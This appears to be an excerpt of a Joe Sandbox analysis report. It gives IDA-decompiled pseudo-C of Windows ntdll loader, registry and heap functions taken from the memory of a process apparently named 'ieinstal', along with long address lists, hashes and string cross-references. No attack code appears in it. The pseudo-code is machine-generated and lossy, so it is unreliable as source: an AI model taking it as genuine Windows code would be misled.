                        0x00000000
                        0x1ed18870
                        0x1ed1887b
                        0x1ed1887d
                        0x1ed1887f
                        0x1ed18881
                        0x1ed18884
                        0x1ed18884
                        0x1ed18886
                        0x1ed18889
                        0x1ed1888c
                        0x1ed1888e
                        0x1ed18891
                        0x1ed18891
                        0x1ed18898
                        0x00000000
                        0x00000000
                        0x1ed1889a
                        0x1ed1889b
                        0x1ed1889e
                        0x00000000
                        0x00000000
                        0x1ed188a0
                        0x1ed188a8
                        0x1ed188b0
                        0x1ed188b2
                        0x1ed188d3
                        0x1ed188d5
                        0x00000000
                        0x1ed188d7
                        0x1ed188db
                        0x1ed188dc
                        0x1ed188e0
                        0x1ed188e8
                        0x1ed188ee
                        0x1ed188f0
                        0x1ed188f3
                        0x1ed188fc
                        0x1ed18901
                        0x1ed18906
                        0x1ed1890c
                        0x1ed1890c
                        0x1ed1890f
                        0x1ed18916
                        0x1ed18917
                        0x1ed18918
                        0x1ed18919
                        0x1ed1891a
                        0x1ed1891f
                        0x1ed18921
                        0x1ed69c52
                        0x1ed69c55
                        0x1ed69c5b
                        0x1ed69cac
                        0x1ed69cc0
                        0x1ed69cc0
                        0x1ed69c55
                        0x1ed18927
                        0x1ed18927
                        0x1ed1892f
                        0x1ed18933
                        0x00000000
                        0x1ed188f5
                        0x1ed188f5
                        0x00000000
                        0x1ed188f7
                        0x1ed188f7
                        0x1ed188fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed188fa
                        0x1ed188f5
                        0x1ed188f3
                        0x00000000
                        0x1ed188d5
                        0x00000000
                        0x1ed188b2
                        0x1ed188c9
                        0x00000000
                        0x1ed188c9
                        0x1ed1887f
                        0x1ed1886a
                        0x1ed18857
                        0x1ed18852
                        0x1ed188bf
                        0x1ed188bf
                        0x1ed187aa
                        0x1ed187ad
                        0x1ed187ae
                        0x1ed187b4
                        0x1ed187b5
                        0x1ed187b6
                        0x1ed187b8
                        0x1ed187bd
                        0x1ed187c1
                        0x1ed187f4
                        0x1ed187fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed187c1
                        0x00000000

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 1ED69C28
                        • LdrpDoPostSnapWork, xrefs: 1ED69C1E
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 1ED69C18
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 2994545307-1948996284
                        • Opcode ID: d84c8398717ab18ebaf32be44b741f76b553bc47c7fb9343d7817d17651188bc
                        • Instruction ID: f555af3ae0d9ef686b69cdb1ef485ca79f46085ce5819b18f29e940494922d2d
                        • Opcode Fuzzy Hash: d84c8398717ab18ebaf32be44b741f76b553bc47c7fb9343d7817d17651188bc
                        • Instruction Fuzzy Hash: 0291D279A002569FDB08CF59E8D2AAAF7B6FF44310B554769E845AF280D731ED01CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED17E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E1ED17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E1ED1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E1ED0C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1edf5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E1ED85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1edf5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E1ED27D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1ED27D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E1ED87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E1ED27D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1ED27D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E1ED87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E1ED3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E1ED0B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                        0x1ed17e4c
                        0x1ed17e50
                        0x1ed17e55
                        0x1ed17e58
                        0x1ed17e5d
                        0x1ed17e71
                        0x1ed17f33
                        0x1ed17e77
                        0x1ed17e77
                        0x1ed17e79
                        0x1ed17e79
                        0x1ed17e7e
                        0x1ed17f45
                        0x1ed69848
                        0x00000000
                        0x1ed69848
                        0x1ed17f4e
                        0x1ed17f53
                        0x1ed17f5a
                        0x00000000
                        0x00000000
                        0x1ed6985a
                        0x1ed69862
                        0x1ed69866
                        0x00000000
                        0x1ed6986c
                        0x00000000
                        0x1ed6986c
                        0x1ed17e84
                        0x1ed17e84
                        0x1ed17e8d
                        0x1ed69871
                        0x1ed17eb8
                        0x1ed17ec0
                        0x1ed17ec0
                        0x1ed17e9a
                        0x1ed6987e
                        0x00000000
                        0x00000000
                        0x1ed69884
                        0x1ed6988b
                        0x1ed698a7
                        0x1ed698ac
                        0x1ed698b1
                        0x1ed698b6
                        0x1ed698b8
                        0x1ed698b8
                        0x1ed698b9
                        0x00000000
                        0x1ed698b9
                        0x1ed17ea0
                        0x1ed17ea7
                        0x00000000
                        0x00000000
                        0x1ed17eac
                        0x1ed17eb1
                        0x1ed17ec6
                        0x1ed17ed0
                        0x1ed698cc
                        0x1ed17ed6
                        0x1ed17ed6
                        0x1ed17ed6
                        0x1ed17ede
                        0x1ed17ee3
                        0x1ed698e3
                        0x1ed698f0
                        0x1ed69902
                        0x1ed698f2
                        0x1ed698fb
                        0x1ed698fb
                        0x1ed69907
                        0x1ed6991d
                        0x1ed6991d
                        0x1ed69907
                        0x1ed698e3
                        0x1ed17ef0
                        0x1ed17f14
                        0x1ed17f14
                        0x1ed17f1e
                        0x1ed69946
                        0x1ed17f24
                        0x1ed17f24
                        0x1ed17f24
                        0x1ed17f2c
                        0x1ed6996a
                        0x1ed69975
                        0x1ed69975
                        0x1ed6997e
                        0x1ed69993
                        0x1ed69993
                        0x1ed6997e
                        0x00000000
                        0x1ed17ef2
                        0x1ed17efc
                        0x1ed17f0a
                        0x1ed17f0e
                        0x1ed69933
                        0x00000000
                        0x1ed69933
                        0x00000000
                        0x1ed17f0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed17eb1

                        Strings
                        • minkernel\ntdll\ldrmap.c, xrefs: 1ED698A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 1ED69891
                        • LdrpCompleteMapModule, xrefs: 1ED69898
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: 69984d0f2d25956cb3a3a1fa4a43970dd9ac9fe9a970893632d2c1e2c52be2db
                        • Instruction ID: 13d939d13771b40ba358bcd6e52cccec918e58d5176cec031f0364cfee9f6c6c
                        • Opcode Fuzzy Hash: 69984d0f2d25956cb3a3a1fa4a43970dd9ac9fe9a970893632d2c1e2c52be2db
                        • Instruction Fuzzy Hash: 12512131A087829FD711CB69D850B9A7BE1EF0A314F5607A9E8919F7E1C730ED00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E1ED0E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E1ED0F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E1ED495D0();
						}
						if(_t78 != 0) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E1ED4FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E1ED4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E1ED49600();
					if(_t97 < 0) {
						goto L6;
					}
					E1ED4BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L1ED0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E1ED4BB40(_t83, _t102 + 0x24, _t78);
								if(L1ED143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E1ED4BB40(_t84, _t102 + 0x24, _t94);
									if(L1ED143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                        0x1ed0e620
                        0x1ed0e628
                        0x1ed0e62f
                        0x1ed0e631
                        0x1ed0e635
                        0x1ed0e637
                        0x1ed0e63e
                        0x1ed65503
                        0x1ed65503
                        0x1ed0e64c
                        0x1ed0e64c
                        0x1ed0e651
                        0x00000000
                        0x00000000
                        0x1ed0e661
                        0x1ed0e665
                        0x1ed6542a
                        0x1ed0e715
                        0x1ed0e71a
                        0x1ed0e71c
                        0x1ed0e720
                        0x1ed0e720
                        0x1ed0e727
                        0x1ed0e736
                        0x1ed0e736
                        0x1ed0e743
                        0x1ed0e743
                        0x1ed0e673
                        0x1ed0e678
                        0x1ed0e67d
                        0x1ed0e682
                        0x1ed0e685
                        0x1ed0e692
                        0x1ed0e69b
                        0x1ed0e6a3
                        0x1ed0e6ad
                        0x1ed0e6b1
                        0x1ed0e6b2
                        0x1ed0e6bb
                        0x1ed0e6bf
                        0x1ed0e6c0
                        0x1ed0e6c8
                        0x1ed0e6cc
                        0x1ed0e6d5
                        0x1ed0e6d9
                        0x00000000
                        0x00000000
                        0x1ed0e6e5
                        0x1ed0e6ea
                        0x1ed0e6f9
                        0x1ed0e70b
                        0x1ed0e70f
                        0x1ed65439
                        0x1ed6545e
                        0x1ed6545e
                        0x00000000
                        0x1ed6545e
                        0x1ed6543b
                        0x1ed6543e
                        0x1ed65440
                        0x1ed65445
                        0x1ed65472
                        0x1ed65475
                        0x1ed6548d
                        0x1ed65493
                        0x1ed654a9
                        0x00000000
                        0x00000000
                        0x1ed654ab
                        0x1ed654b4
                        0x1ed654bc
                        0x1ed654c8
                        0x1ed654de
                        0x1ed654fb
                        0x1ed654e0
                        0x1ed654e6
                        0x1ed654eb
                        0x1ed654eb
                        0x1ed654de
                        0x00000000
                        0x1ed654bc
                        0x1ed65477
                        0x1ed6547a
                        0x1ed65480
                        0x1ed65483
                        0x1ed65486
                        0x1ed6548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed6548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed65447
                        0x1ed65447
                        0x1ed65447
                        0x1ed65447
                        0x1ed6544e
                        0x00000000
                        0x00000000
                        0x1ed65450
                        0x1ed65452
                        0x1ed65455
                        0x1ed6545a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed6545c
                        0x1ed6546a
                        0x1ed6546d
                        0x1ed6546f
                        0x00000000
                        0x1ed6546f
                        0x1ed0e70f

                        Strings
                        • InstallLanguageFallback, xrefs: 1ED0E6DB
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1ED0E68C
                        • @, xrefs: 1ED0E6C0
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 3df476597419c3c3b6f8f9a2a1de54072f194602363ce1177eae6c73ee8b7fd7
                        • Instruction ID: f3b7030083013fd92d569c0436c5be735b0e17dbec91c218d62930cff4306f56
                        • Opcode Fuzzy Hash: 3df476597419c3c3b6f8f9a2a1de54072f194602363ce1177eae6c73ee8b7fd7
                        • Instruction Fuzzy Hash: 8D517F765083869BC701CF65C450BABB3E9BF88614F550FAEF985E7240E734EA44C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDCE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E1EDCE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E1EDCBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E1EDCBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E1EDCAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E1ED49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E1EDCA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E1EDCA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E1ED49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E1EDCA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E1EDCA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E1ED22280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E1ED1B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E1ED1FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E1ED27D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E1EDBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                        0x1edce547
                        0x1edce549
                        0x1edce54f
                        0x1edce553
                        0x1edce557
                        0x1edce55a
                        0x1edce55c
                        0x1edce55f
                        0x1edce561
                        0x1edce567
                        0x1edce56b
                        0x1edce7e2
                        0x00000000
                        0x1edce571
                        0x1edce575
                        0x1edce577
                        0x1edce57b
                        0x1edce57c
                        0x1edce57d
                        0x1edce57e
                        0x1edce57f
                        0x1edce588
                        0x1edce58f
                        0x1edce591
                        0x1edce592
                        0x1edce592
                        0x1edce596
                        0x1edce59e
                        0x1edce5a0
                        0x1edce5a6
                        0x1edce61d
                        0x1edce61d
                        0x1edce621
                        0x1edce623
                        0x1edce630
                        0x1edce630
                        0x1edce7e6
                        0x1edce7eb
                        0x1edce7ed
                        0x1edce7f4
                        0x1edce7fa
                        0x1edce7ff
                        0x1edce7ff
                        0x1edce80a
                        0x1edce812
                        0x1edce812
                        0x1edce5ab
                        0x1edce5b4
                        0x1edce5b9
                        0x1edce5be
                        0x1edce5c0
                        0x1edce5c2
                        0x1edce5c8
                        0x1edce5c9
                        0x1edce5cb
                        0x1edce5cc
                        0x1edce5d5
                        0x1edce5e4
                        0x1edce5f1
                        0x1edce5f8
                        0x1edce5f8
                        0x1edce5d5
                        0x1edce602
                        0x1edce616
                        0x1edce63d
                        0x1edce644
                        0x1edce64d
                        0x1edce652
                        0x1edce657
                        0x1edce659
                        0x1edce65b
                        0x1edce661
                        0x1edce662
                        0x1edce664
                        0x1edce665
                        0x1edce66e
                        0x1edce67d
                        0x1edce68a
                        0x1edce691
                        0x1edce691
                        0x1edce66e
                        0x1edce6b0
                        0x00000000
                        0x1edce6b6
                        0x1edce6bd
                        0x1edce6c7
                        0x1edce6d7
                        0x1edce6d9
                        0x1edce6db
                        0x1edce6de
                        0x1edce6e3
                        0x1edce6f3
                        0x1edce6fc
                        0x1edce700
                        0x1edce700
                        0x1edce704
                        0x1edce70a
                        0x1edce70a
                        0x1edce713
                        0x1edce716
                        0x1edce719
                        0x1edce720
                        0x1edce761
                        0x1edce76b
                        0x1edce774
                        0x1edce77a
                        0x1edce77a
                        0x1edce78a
                        0x1edce791
                        0x1edce799
                        0x1edce79b
                        0x1edce79f
                        0x1edce7aa
                        0x1edce7c0
                        0x1edce7ac
                        0x1edce7b2
                        0x1edce7b9
                        0x1edce7b9
                        0x1edce7c7
                        0x1edce806
                        0x00000000
                        0x1edce7c9
                        0x1edce7d1
                        0x1edce7d8
                        0x00000000
                        0x1edce7d8
                        0x00000000
                        0x00000000
                        0x1edce722
                        0x1edce72e
                        0x1edce748
                        0x1edce74c
                        0x1edce754
                        0x1edce756
                        0x1edce75c
                        0x1edce75c
                        0x00000000
                        0x1edce75c
                        0x1edce758
                        0x1edce758
                        0x00000000
                        0x1edce758
                        0x1edce750
                        0x00000000
                        0x00000000
                        0x1edce752
                        0x00000000
                        0x1edce752
                        0x1edce730
                        0x1edce735
                        0x1edce73d
                        0x1edce73f
                        0x00000000
                        0x00000000
                        0x1edce741
                        0x1edce741
                        0x00000000
                        0x1edce741
                        0x1edce739
                        0x00000000
                        0x00000000
                        0x1edce73b
                        0x00000000
                        0x1edce73b
                        0x1edce722
                        0x1edce720
                        0x1edce6b0
                        0x1edce618
                        0x00000000
                        0x1edce618

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 813f24394a8793174d7a9d37d8fdcb3f571b4a531875b52cb3aa929dc4cbfe8c
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: 3D919EB52043429FE710CE25C941B2BB7E6AF84794F148E2DF995CB2C0E774E904CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED851BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E1ED851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1ede05f0);
				E1ED5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
